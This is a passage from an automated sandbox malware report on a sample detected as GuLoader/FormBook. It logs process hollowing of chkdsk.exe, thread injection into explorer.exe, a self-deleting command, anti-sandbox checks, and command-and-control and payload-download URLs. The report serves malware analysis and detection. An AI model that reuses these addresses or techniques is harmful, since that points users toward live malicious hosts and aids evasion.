      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05464F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05478794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05477E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0552AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05498E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05521608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0551FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05538ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054936CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0551FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054776E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054916E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05530EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05469100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05469100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05469100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05484120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054F41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0546B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05492990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054961A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054961A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_055249A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054899BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05480050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05480050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05522073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05531074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05534015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05534015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0549002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0547B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054640E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054658EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_0548B8E4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_05469080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054E3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054920A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.creditmystartup.com
      Source: C:\Windows\explorer.exeDomain query: www.dunn-labs.com
      Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
      Source: C:\Windows\explorer.exeDomain query: www.thehomechef.global
      Source: C:\Windows\explorer.exeNetwork Connect: 31.44.185.28 80
      Source: C:\Windows\explorer.exeDomain query: www.mothererph.com
      Source: C:\Windows\explorer.exeDomain query: www.mikecdmusic.com
      Source: C:\Windows\explorer.exeDomain query: www.bloomandbrewcafe.com
      Source: C:\Windows\explorer.exeDomain query: www.oubacm.com
      Source: C:\Windows\explorer.exeDomain query: www.ooweesports.com
      Source: C:\Windows\explorer.exeDomain query: www.tearor.com
      Source: C:\Windows\explorer.exeDomain query: www.foeweifgoor73dz.com
      Source: C:\Windows\explorer.exeDomain query: www.amazonautomationbusiness.com
      Source: C:\Windows\explorer.exeNetwork Connect: 198.50.252.64 80
      Source: C:\Windows\explorer.exeDomain query: www.gentrypartyof8.com
      Source: C:\Windows\explorer.exeNetwork Connect: 35.208.122.142 80
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.53.7 80
      Source: C:\Windows\explorer.exeDomain query: www.howtovvbucks.com
      Source: C:\Windows\explorer.exeNetwork Connect: 212.32.237.90 80
      Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.196 80
      Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80
      Source: C:\Windows\explorer.exeNetwork Connect: 45.33.252.45 80
      Source: C:\Windows\explorer.exeDomain query: www.pacleanfuel.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeNetwork Connect: 45.193.166.57 80
      Source: C:\Windows\explorer.exeDomain query: www.yellow-wink.com
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeThread register set: target process: 3388
      Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3388
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: E30000
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
      Source: explorer.exe, 0000001D.00000000.454581966.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
      Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 0000001D.00000000.443775081.0000000006860000.00000004.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000001D.00000000.454839868.0000000001980000.00000002.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1287403199.00000000068D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: F63V4i8eZU.exe PID: 772, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: chkdsk.exe PID: 5756, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery621Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Information Discovery31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 450884 Sample: F63V4i8eZU.exe Startdate: 19/07/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 7 other signatures 2->42 10 F63V4i8eZU.exe 1 2->10         started        process3 signatures4 52 Contains functionality to detect hardware virtualization (CPUID execution measurement) 10->52 54 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 10->54 56 Tries to detect Any.run 10->56 58 3 other signatures 10->58 13 F63V4i8eZU.exe 6 10->13         started        process5 dnsIp6 34 kinmirai.org 133.130.104.18, 443, 49746 INTERQGMOInternetIncJP Japan 13->34 60 Modifies the context of a thread in another process (thread injection) 13->60 62 Tries to detect Any.run 13->62 64 Maps a DLL or memory area into another process 13->64 66 3 other signatures 13->66 17 explorer.exe 13->17 injected signatures7 process8 dnsIp9 28 www.howtovvbucks.com 81.17.18.196, 49753, 80 PLI-ASCH Switzerland 17->28 30 137gate.com 31.44.185.28, 80 PINDC-ASRU Russian Federation 17->30 32 22 other IPs or domains 17->32 44 System process connects to network (likely due to code injection or exploit) 17->44 21 chkdsk.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      F63V4i8eZU.exe10%VirustotalBrowse
      F63V4i8eZU.exe9%ReversingLabsWin32.Trojan.Convagent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.yellow-wink.com/nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.mothererph.com/nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg0%Avira URL Cloudsafe
      http://farmersschool.ge/bin_QVwEr224.bin0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllM0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.amazonautomationbusiness.com/nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.tearor.com/nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o0%Avira URL Cloudsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.mikecdmusic.com/nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o0%Avira URL Cloudsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      www.yellow-wink.com/nff/0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.gentrypartyof8.com/nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o0%Avira URL Cloudsafe
      http://www.howtovvbucks.com/nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj0%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.ooweesports.com/nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE0%Avira URL Cloudsafe
      http://www.thehomechef.global/nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
